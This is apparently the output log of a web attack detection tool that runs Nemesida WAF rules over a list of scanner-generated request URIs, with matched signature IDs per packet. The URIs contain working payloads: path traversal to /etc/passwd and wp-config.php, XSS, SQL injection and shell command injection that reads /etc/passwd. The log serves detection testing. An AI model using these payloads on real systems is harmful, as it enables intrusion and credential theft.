# inspectorlog v3.5
#----- Initializing Rules (NEMESIDA)  ---------------------
#	Opening NEMESIDA rule file /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt...
#		Rules: read [506], erroneous [0], URI (URL|ARGS) [449]
#-----  Statistics (NEMESIDA) ------------------------------
# Read [506] nemesida rules, [449] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l vulnerabilities.uri -m /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt -t list -o /home/kali/TFG/inspectorlog/nemesida/web_dinamica/owasp/opensource/nuclei/vulnerabilities.clean
Packet [1]	Uri [/web/download.php?file=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [2]	Uri [/web/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [4]	Uri [/web/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [5]	Uri [/web/index.php?g=g&m=Door&a=index&content=<?php%20phpinfo();]	Nattacks [4]	Signatures	[300000051]	[300000053]	[300001313]	[300001871]
Packet [6]	Uri [/web/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [10]	Uri [/web//netcore_get.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [12]	Uri [/web/QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx]	Nattacks [1]	Signatures	[300001145]
Packet [14]	Uri [/web/webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter=]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [17]	Uri [/web/Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [5]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]	[300001053]
Packet [18]	Uri [/web/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html]	Nattacks [4]	Signatures	[300000052]	[300000508]	[300000515]	[300000537]
Packet [19]	Uri [/web/wp-content/themes/prostore/go.php?https://example.com/]	Nattacks [1]	Signatures	[300001136]
Packet [21]	Uri [/web/api/downloads?fileName=../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [22]	Uri [/web/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [23]	Uri [/web/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [24]	Uri [/web/main/calendar/agenda_list.php?type=xss"+onmouseover=alert(document.domain)+"]	Nattacks [3]	Signatures	[300000508]	[300000532]	[300000550]
Packet [26]	Uri [/web/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [28]	Uri [/web/cgi-bin/slogin/login.py]	Nattacks [1]	Signatures	[300001513]
Packet [29]	Uri [/web/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini]	Nattacks [1]	Signatures	[300001517]
Packet [31]	Uri [/web/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E]	Nattacks [3]	Signatures	[300000052]	[300000528]	[300002793]
Packet [32]	Uri [/web/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('24s4earAkcPDVwwSlO75VJb3k97')%3E]	Nattacks [5]	Signatures	[300000052]	[300000053]	[300000508]	[300000528]	[300001063]
Packet [36]	Uri [/web/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('24s4earAkcPDVwwSlO75VJb3k97')%3E]	Nattacks [5]	Signatures	[300000052]	[300000053]	[300000508]	[300000528]	[300001063]
Packet [37]	Uri [/web/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [38]	Uri [/web/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'']	Nattacks [2]	Signatures	[300000052]	[300002743]
Packet [39]	Uri [/web/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('24s4earAkcPDVwwSlO75VJb3k97')%3E]	Nattacks [5]	Signatures	[300000052]	[300000053]	[300000508]	[300000528]	[300001063]
Packet [41]	Uri [/web/webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter=]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [44]	Uri [/web/Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [5]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]	[300001053]
Packet [45]	Uri [/web/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html]	Nattacks [4]	Signatures	[300000052]	[300000508]	[300000515]	[300000537]
Packet [46]	Uri [/web/wp-content/themes/prostore/go.php?https://example.com/]	Nattacks [1]	Signatures	[300001136]
Packet [48]	Uri [/web/api/downloads?fileName=../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [49]	Uri [/web/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [50]	Uri [/web/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [51]	Uri [/web/main/calendar/agenda_list.php?type=xss"+onmouseover=alert(document.domain)+"]	Nattacks [3]	Signatures	[300000508]	[300000532]	[300000550]
Packet [52]	Uri [/web/.wp-config.php.swp]	Nattacks [2]	Signatures	[300001512]	[300001518]
Packet [53]	Uri [/web/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [54]	Uri [/web/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001053]	[300001145]
Packet [55]	Uri [/web/cgi-bin/slogin/login.py]	Nattacks [1]	Signatures	[300001513]
Packet [57]	Uri [/web/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [59]	Uri [/web/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E]	Nattacks [3]	Signatures	[300000052]	[300000528]	[300002793]
Packet [62]	Uri [/web/?{alert(1)}]	Nattacks [1]	Signatures	[300000508]
Packet [63]	Uri [/web/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'']	Nattacks [2]	Signatures	[300000052]	[300002743]
Packet [64]	Uri [/web/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/]	Nattacks [3]	Signatures	[300001359]	[300001516]	[300002734]
Packet [65]	Uri [/web/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [66]	Uri [/web/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp]	Nattacks [2]	Signatures	[300000051]	[300001559]
Packet [67]	Uri [/web/cgi-bin/operator/fileread?READ.filePath=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [71]	Uri [/web/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [72]	Uri [/web/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'`]	Nattacks [6]	Signatures	[300000039]	[300000040]	[300000052]	[300000068]	[300001130]	[300002743]
Packet [75]	Uri [/web/.wp-config.php.swp]	Nattacks [2]	Signatures	[300001512]	[300001518]
Packet [77]	Uri [/web/monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [78]	Uri [/web/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=aaa]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001053]	[300001145]
Packet [80]	Uri [/web/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E]	Nattacks [3]	Signatures	[300000508]	[300000515]	[300000537]
Packet [82]	Uri [/web/?{alert(1)}]	Nattacks [1]	Signatures	[300000508]
Packet [83]	Uri [/web/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp]	Nattacks [2]	Signatures	[300000051]	[300001559]
Packet [84]	Uri [/web/cgi-bin/operator/fileread?READ.filePath=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [88]	Uri [/web/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [89]	Uri [/web/manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../poc.txt&id=1]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [92]	Uri [/web/portal/info.jsp]	Nattacks [1]	Signatures	[300001516]
# N. packets [93], [56] with alerts, N. Alerts [167]
# Execution time: 0.044818 s
